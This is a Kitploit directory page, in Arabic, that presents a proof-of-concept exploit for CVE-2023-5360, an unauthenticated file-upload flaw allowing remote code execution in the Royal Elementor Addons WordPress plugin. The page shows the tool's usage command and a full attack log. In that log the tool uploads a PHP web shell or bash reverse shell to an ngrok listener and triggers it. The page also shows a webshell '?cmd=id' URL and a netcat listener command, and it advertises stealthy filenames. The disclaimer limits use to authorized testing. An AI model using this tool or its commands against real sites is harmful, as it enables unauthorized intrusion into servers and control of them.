Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-5360 — Royal Elementor Addons - تنفيذ تعليمات برمجية عن بعد غير مصادق عليه | Kitploit
أدوات/GitHubGitHub/x3rx3ssec/cve-2023-5360
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubx3rx3ssec/cve-2023-5360

CVE-2023-5360

Royal Elementor Addons - تنفيذ تعليمات برمجية عن بعد غير مصادق عليه

عرض المستودع
211منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-5360 استغلال تحميل الملفات في Elementor

إن إضافة Royal Elementor Addons and Templates لـ WordPress قبل الإصدار 1.3.79 لا تتحقق بشكل صحيح من الملفات المرفوعة، مما قد يسمح للمستخدمين غير المصادق عليهم برفع ملفات عشوائية، مثل PHP وتحقيق تنفيذ التعليمات البرمجية عن بُعد (RCE).

root@kitploit:~
   _______    ________     
  / ____/ |  / / ____/     
 / /    | | / / __/______  
/ /___  | |/ /__/_____/  
\____/  |___/_____/_____   
  |__ \ / __ \__ \|__  /   
  __/ // / / /_/ / /_ <    
 / __// /_/ / __/___/ /    
/____/\____/____/____/____ 
   / ____/__  // ___// __ \
  /___ \  /_ </ __ \/ / / /
 ____/ /___/ / /_/ / /_/ / 
/_____//____/\____/\____/  

بواسطة X3RX3S

الوصف

هذا هو استغلال إثبات المفهوم لـ CVE-2023-5360، وهي ثغرة تحميل الملفات في Elementor Pro لـ WordPress. تسمح لمهاجم غير مصادق عليه برفع ملفات PHP عشوائية والحصول على تنفيذ التعليمات البرمجية عن بُعد.

الميزات

  • الحصول على nonce Elementor تلقائيًا
  • تحميل شيل ويب بسيط أو شيل عكسي
  • أسماء ملفات فريدة للتخفي
  • مساعد مستمع Netcat اختياري
  • جذاب جدًا

الاستخدام

root@kitploit:~
python3 CVE-2023-5360.py <https://victim.site/>

مثال:

root@kitploit:~
python3 CVE-2023-5360.py https://victim.site/


      _______    ________     
     / ____/ |  / / ____/     
    / /    | | / / __/______  
   / /___  | |/ /__/_____/  
   \____/  |___/_____/_____   
       |__ \ / __ \__ \|__  /   
       __/ // / / /_/ / /_ <    
      / __// /_/ / __/___/ /    
     /____/\____/____/____/____ 
         / ____/__  // ___// __ \
        /___ \  /_ </ __ \/ / / /
       ____/ /___/ / /_/ / /_/ / 
      /_____//____/\____/\____/  

         github.com/X3RX3SSec    
      by X3RX3S aka @mindfuckerrrr


[+] Target: https://victim.site
[+] Elementor page: https://victim.site)
[*] Step 1: Grabbing Elementor nonce...
[+] HTTP 200 received from target
[+] Nonce extracted: fdcb5015cd

[*] Step 2: Configure payload
  [1] Simple command webshell
  [2] Reverse shell (bash)
[?] Choose payload [1/2]: 2
[?] LHOST (your IP): 7.tcp.eu.ngrok.io
[?] LPORT (your PORT): 31337
[+] Reverse shell payload generated for 7.tcp.eu.ngrok.io:31337
[?] Start built-in listener? [Y/n]: Y
[+] Starting local listener on 7.tcp.eu.ngrok.io:31337...

[*] Attempt 1 of 3: Uploading payload via AJAX exploit...
[>] POST https://victim.site/wp-admin/admin-ajax.php
listening on [any] 31337 ...
[+] HTTP 200 from upload handler
[+] Shell uploaded: https://victim.site/wp-content/uploads/wpr-addons/forms/shell-6253.php
[*] Triggering reverse shell. Have your listener ready!
[+] Trigger sent (timeout is normal for reverse shell).
[+] Arrr! Cannons fired. Check your listener! 🏴‍☠️💣

خيارات الحمولة:

  1. شيل ويب أوامر بسيط (?cmd=id كما في: https://victim.site/wp-content/uploads/wpr-addons/forms/shell.php?cmd=id)
  2. شيل عكسي (Bash)

التبعيات

  • Python 3.x
  • وحدة requests

تثبيت التبعيات:

root@kitploit:~
pip install requests

مثال للمستمع

root@kitploit:~
nc -lvnp 1337

إخلاء مسؤولية

هذا الاستغلال مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط. أنت مسؤول عن كيفية استخدامه. اختبر فقط على الأنظمة التي تملكها أو لديك إذن لاختبارها.

الاعتمادات

المؤلف: X3RX3S CVE-2023-5360

تنزيل الأداة